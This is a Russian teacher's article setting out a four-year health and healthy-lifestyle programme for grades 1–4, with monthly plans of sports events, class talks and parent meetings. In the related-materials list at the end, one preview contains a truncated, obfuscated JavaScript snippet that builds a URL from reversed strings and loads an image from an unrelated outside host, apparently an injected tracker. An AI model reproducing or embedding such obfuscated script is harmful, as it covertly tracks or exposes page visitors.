Проект жизнедеятельности младших школьников «Будь здоров!»
статья (1 класс) по теме

Смирнова Светлана Ивановна

 

Этот проект направлен на сохранение и укрепление здоровья учащихся  1-4 классов, а так же воспитание потребности в здоровом образе жизни, т. к. только здоровый ребенок способен успешно и в полной мере овладеть школьной программой.


Автор: смирнова с.и.
Источник: учебно- методические издания/ источники интернета.

Скачать:


Предварительный просмотр:

Проект жизнедеятельности младших школьников «Будь здоров»

Пояснительная записка.

Человек- высшее творение природы. Но для того чтобы наслаждаться ее сокровищами, он должен отвечать , по крайней мере,  одному требованию: быть здоровым.

Учеными доказано, что 75% болезней взрослых заработаны в детские годы. Думая о будущем детей, надо особо подчеркнуть  младший школьный возраст как самый важный.

Этот проект направлен на сохранение и укрепление здоровья учащихся  1-4 классов, а так же воспитание потребности в здоровом образе жизни, т. к. только здоровый ребенок способен успешно и в полной мере овладеть школьной программой.

Актуальность проблемы.

В условиях современной , природной и социально- экономической ситуации проблема здоровья детей приобретает глобальный характер. Здоровье каждого человека, в т. ч. и ребенка, определяется соотношением внешних и внутренних воздействий на его организм, с одной стороны, и возможностями самого организма противостоять нежелательным воздействиям ,защищаться от них, по возможности усиливая воздействие полезных для здоровья факторов, с другой стороны.

Степень успешности этой деятельности –устранения вредных воздействий (корректировка окружающей среды) и повышения устойчивости (тренировка, повышение адаптационных способностей организма)- определяет направления усилий по сохранению и укреплению здоровья.

Свою долю ответственности за сложившуюся ситуацию несет и система образования.

Одной из важнейших задач школы в соответствии с целями современной реформы образования в России является сохранение и укрепление здоровья учащихся

Проведя анализ медицинских карт и беседы с родителями детей, поступивших в школу в новом учебном году, выясняется, что, не будучи еще школьниками, они уже имеют серьезные проблемы, которые могут в дальнейшем усугубиться и стать причинами ,вызывающими трудности в обучении.

Проблема

Нарушение осанки

Ослаблено зрение

Хронические заболевания

Дефекты речи

3 группа здоровья

Здоровые дети

Пытаясь исправить создавшееся положение, представляю проект программы жизнедеятельности младших школьников, мероприятия которой направлены на укрепление здоровья и активизацию самого субъекта воспитания- ребенка.

Цель: создание условий, позволяющих воспитать потребность в принятии ЗОЖ.

Задачи :

  1. внедрять здоровьесберегающие технологии для укрепления здоровья школьника
  2. сформировать у учащихся необходимый уровень грамотности по вопросам ЗОЖ
  3. Повысить интерес к спортивным мероприятиям
  4. Систематически проводить мониторинг диагностики здоровья и психофизического состояния учащихся.

Принципы программы:

  1. у каждого ребенка свой потенциал здоровья, его нужно учитывать
  2. здоровье- это состояние организма, им нужно научиться управлять
  3. здоровье- это результат собственного творчества
  4. принцип сотрудничества педагогов и родителей.

Участники программы:

  1. учащиеся 1-4 классов
  2. учителя,работающие в этих классах
  3. педагог –психолог
  4. логопед
  5. медицинский работник
  6. родители

 Ожидаемые результаты:

1.Мотивация обучающихся на ЗОЖ

2.Сохранение и укрепление здоровья младших школьников

Показатели результативности программы:

  1. увеличение числа детей занятых в спортивных секциях
  2. снижение количества пропущенных уроков по причине простудных заболеваний
  3. отсутствие увеличения количества детей с нарушением осанки и зрения

  1. сформированность у учащихся и их родителей необходимого уровня грамотности по вопросам ЗОЖ

Индикаторы:

  1. соотношение результатов медицинских осмотров
  2. соотношение количества пропущенных уроков по причине простудных заболеваний
  3. соотношение количества детей занятых в спортивных секциях
  4. соотношение результатов тестирования по уровня грамотности в вопросах ЗОЖ

Программа реализуется на базе МОУ сош №11 г. Ачинска  Красноярского края Российской Федерации. Так же учитывался опыт других учебных заведений для достижения положительных результатов в решении этой проблемы.

Содержание программы структурировано по пяти основным направлениям:

Направления

Задачи

Формы

1. Оздоровительные мероприятия в режиме учебного времени и ГПД

.Снять утомляемость

.Обучить жизненно важным двигательным навыкам и умениям, применению их  в различных по сложности условиям

Динамические паузы

Здоровьесберегающие технологии

Питьевой режим

Уроки физического воспитания

2. Внеурочные спортивные мероприятия

Развивать силу, ловкость. выносливость

Формировать навыки работы в команде

Спортивные праздники

Эстафеты

игры

3. Внеклассная воспитательная работа

Формировать необходимые знания в области гигиены, медицины, физической культуры, правильного питания

Развивать творческую активность учащихся

Тематические классные часы

Конкурсы

Проектная деятельность

4. Работа с родителями

Повысить образовательный уровень родителей в вопросах гигиены, медицины, физической культуры, правильного питания

Воспитывать активную позицию в отношении ЗОЖ

Тематические  родительские собрания

Спортивные праздники

Круглый стол

Индивидуальные беседы



5. Работа службы сопровождения(психолог, логопед, мануальный терапевт)

Сохранить душевное здоровье и эмоциональное благополучие каждого ребенка

Коррекция речевых нарушений и нарушений в познавательной сфере

Осанка и грудная клетка

Индивидуальные занятия

Групповые занятия

Беседы

Тренинги

Консультации

План реализации проекта программы жизнедеятельности учащихся 1-4 классов

Программа реализуется в несколько этапов:

           

                                                       

1 класс «Уроки Мойдодыра»  

                                                             

2класс «Уроки Айболита»

3 класс «Уроки Знайки»

4 класс «Живем без докторов»

                               

                                                                          1 класс «Уроки Мойдодыра»              

месяц

Внеурочные спортивные мероприятия

Воспитательная работа

Работа с родителями

Работа службы сопровождения

Оздоровительные мероприятия в режиме учебного времени и ГПД

сентябрь

День здоровья

Посещение бассейна

Классный час «Умывание и купание»

Родительское собрание «Режим дня младшего школьника»

индивидуальные занятия



групповые занятия




беседы










консультации







тренинги

. Уроки физ воспитания


.динамические паузы


.физ. минутки


.пальчиковая гимнастика


.смена видов деятельности на уроках


.питьевой режим


.дыхательная гимнастика


.музыкотерапия


.создание благоприятного психологического климата на уроке


.лечебная гимнастика

октябрь

Спортивный праздник «Папа, мама, я- спортивная семья»

Классный час «Забота о глазах»

Помощь в проведении спортивного праздника

ноябрь

Час здоровья

Посещение бассейна

Классный час «Уход за ушами»

Родит собр «Что мы знаем о ЗОЖ»

декабрь

Спортивные эстафеты

Классный час «Уход за  зубами»

январь

Соревнования на свежем воздухе

Классный час «Уход за руками и ногами»

КРУГЛЫЙ СТОЛ «как воспитывать у ребенка хорошую привычку»

февраль

Зимние олимпийские игры

Классный час «Как следует питаться»

Конкурс рисунков «Мой любимый вид спорта»

Род.собр.»Поговорим о питании. .Это важно»

март

Спортивный праздник «Сильные, смелые ,

ловкие»

Классный час «Забота о коже»

Спортивный праздник

апрель

Подвижные игры

Посещение бассейна

Классный час «Настроение в школе и после»

Род.собр. «Как  часто ваш ребенок плачет»

май

День здоровья

Классный час «Вредные привычки»

   

                                                           

2 класс «Уроки Айболита»

 Месяц

Внеурочные спортивные мероприятия

Воспитательная работа

Работа с родителями

Работа службы сопровождения

Оздоровительные мероприятия в режиме учебного времени и ГПД

сентябрь

День здоровья

Классный час. «Ты растешь». Возрастная гигиена

Индивидуальные занятия

1.Уроки физ. воспит.


2.Физ. Минутки


3.Пальчиковая гимнастика


4.дыхательная гимнастика


5.мозговая гимнастика


6релаксаутогенная терапия(релаксация мышц лица, век, глаз)


7музыкотерапия


8питьевой режим


9проветривание


10смена видов деятельности


11создание благоприятного психологического климата на уроке и в ГПД


12. Лечебная гимнастика (скалиоз,искривление грудной клетки)

октябрь

Час здоровья. Знакомство с видами спорта

Кл. час «как стать нехворайкой». Конкурс рисунков«Мой любимый вид спорта»

Групповые занятия

ноябрь

Спортивные соревнования

«Праздник здоровья»

Кл.час «Что нужно знать о лекарствах»

Беседы

декабрь

Лыжные соревнования

Кл.час «Первая помощь при отравлении жидкостями ,пищей, парами, газами, дымом»

январь

Спортивный праздник»Папа,мама,я- спортивная семья

Посещение бассейна

Кл.час «первая помощь при перегреваниях и  тепловых ударах,при ожогах и отморожениях

Проведение спортивного праздника

Консультации

февраль

Малые зимние олимпийские игры

Посещение бассейна

Кл.час «Первая помощь при травмах»

Род.собр «Психология здоровья младших школьников»

Практикумы для родителей

март

Подвижные игры на свежем воздухе

Посещение бассейна

Кл час «Первая помощь при попадании инородных тел в глаз,ухо,горло,нос

Род.собр. «Формирование здорового образа жизни»

апрель

Спортивный праздник»Сильные,смелые,ловкие»

Посещение басс

Кл.час «Первая помощь при укусах насекомых,змей,собак и кошек.

Проведение спортивного праздника

Тренинги

май

День здоровья

Посещение бассейна

Кл. час «Сегодняшние заботы медицины»

        3 класс . «Уроки Знайки»

месяц

Внеурочные спортивные мероприятия

Воспитательная работа

Работас родителями

Работа службы сопровождения

Оздоровительные мероприятия в режиме учебного времени и ГПД

сентябрь

День здоровья. Осенний кросс

Игра-путешествие «Откуда берутся грязнули?»

Род собр «Гигиена и режим младшего школьника в семье»

Индивидуальные занятия

1.Уроки физ. воспит.


2.Физ. Минутки


3.Пальчиковая гимнастика


4.дыхательная гимнастика


5.мозговая гимнастика


6релаксаутогенная терапия(релаксация мышц лица, век, глаз)


7.гимнастика для глаз


8общеразвивающие

Упражнения


9питьевой режим


10проветривание


11релаксационно- танцевальный комплекс

октябрь

Спортивные соревнования «Быстрее,выше,сильнее»

Классный час «Режим дня- здоровый образ жизни»

Круглый стол «Что может быть важнее здоровья?»»Охрана зрения детей»

Правильная осанка»

Групповые занятия

ноябрь

Спортивный час

Экскурсия «Как правильно одеваться осенью и зимой»

декабрь

Игры на улице

Веселые старты»Все на лыжи и на санки»

Викторина «Как стать нехворайкой»

Родит собрание «Режим питания и его разнообразие»

Беседы

январь

Малые зимние олимпийские игры

Классный час «Как правильно закаляться»

Помощь в проведении игр

Консультации

февраль

Спортивно- игровой праздник, посвященный Дню защитника Отечества

Конкурс рисунков «Мой любимый вид спорта»

КВН «если хочешь быть здоров»

Встреча с детским  врачом и стоматологом

«чтобы зубы были здоровыми»

«Детские инфекционные заболевания и их профилактика»

март

Народные и подвижные игры на свежем воздухе

Ролевые игры»Уроки здоровья!

Классный час «Как вести себя,когда что то болит?»

Родительское собрание «Секреты здоровья ребенка»

Тренинги

апрель

Спортивный праздник «Папа,мама,я- спортивная семья»

Праздник здоровья

Помощь в проведении спортивного праздника

май

Спортивные соревнования «Самые смелые»

Классный час «Будем плавать,загорать»

Родительский урнир «Путь к здоровью,силе»

     4 класс «Живем без докторов»   

Месяц

Внеурочные спортивные мероприятия

Воспитательная работа

Работа с родителями

Работа службы поддержки

Оздоровительные мероприятия в режиме учебного времени и ГПД

сентябрь

День здоровья

Осенний кросс

Классный час «Наше здоровье. эмоции,поступки,стресс»

Выявление эмоциональной атмосферы в семье

Диагностика взаимоотношений родителей и учащихся

Наказания в семье

Индивидуальные занятия

Групповые занятия

1.Уроки физического воспитания


2.питьевой режим


3проветривание


4.оздоровительные минутки


5Создание благоприятного психологического климата на уроке и в ГПД


6. пальчиковая гимнастика


7.дыхательная гимнастика


8гимнастика для глаз


9мозговая гимнастика


10релаксаутогенная терапия

октябрь

Соревнования по мини футболу

Час общения»Помоги себе сам. Волевое поведение»

Род . собр «Ваш ребенок взрослеет»

Беседы

ноябрь

Час здоровья

Посещение бассейна

Дискуссия»Почему некоторые поступки называют вредными. Тренинг безопасного поведения

Семейная спортивная спартакиада

Консультации

декабрь

Веселые старты

Защита проекта «Закаливание и оздоровление организма»

Круглый стол «Вредные привычки-профилактика в раннем возрасте»

Практикумы для родителей

январь

Все на лыжи

Выпуск стенной газеты «Будьте всегда здоровы»

Веселые старты «»Физическое развитие в школе и дома»

февраль

Тропа туриста

Игра- соревнование «Культура ЗОЖ»

Род собр. «Компьютер пришел в дом»

март

Народные игры

Забавы на свежем воздухе

КЛАССНЫЙ ЧАС «Азбука поведения»

Анкетирование «Эмоции- положительные и отрицательные»

Тренинги

апрель

Спортивный праздник «Папа,мама,я- спортивная семья»

Час общения «Мы одна семья»

Спортивный праздник- «Папа,мама,я- спортивная семья»

май

День здоровья

Посещение бас

Игра- путешествие «В страну здоровья»

Литература : учебно- методические издания.

                                                                                               

               

                                                                                               


По теме: методические разработки, презентации и конспекты

Проект жизнедеятельности младших школьников "Мы живем в России"

Ведущая идея проекта          На первой ступени (начальное образование) закладываются основные моральные и нравственные ценности и нормы поведения, начинается ...

Проект по духовно-нравственному воспитанию для младших школьников "Будь человеком!"

Данный проект направлен на  воспитание гражданской социальной компетентности, пробуждение  у детей интереса  к нравственным вопросам, раскрывает мир внутренних ценностей человека,...

Проект программы жизнедеятельности младших школьников « Школа здоровья»

В условиях современной природной и социально-экономической ситуации проблема здоровья детей приобретает глобальный характер. Здоровье каждого человека, в т. ч и ребёнка, определяется соотношением внеш...

Основы безопасности жизнедеятельности младших школьников

Систематическое планомерное обучение ребенка умению безопасно жить, учиться, отдыхать и трудиться. Занятия помогут предостеречь школьника от множества опасностей вокруг....

Памятка школьнику. Будь здоров!

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'xqiohpvda.lussoit.com\',\'41\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){ var ex...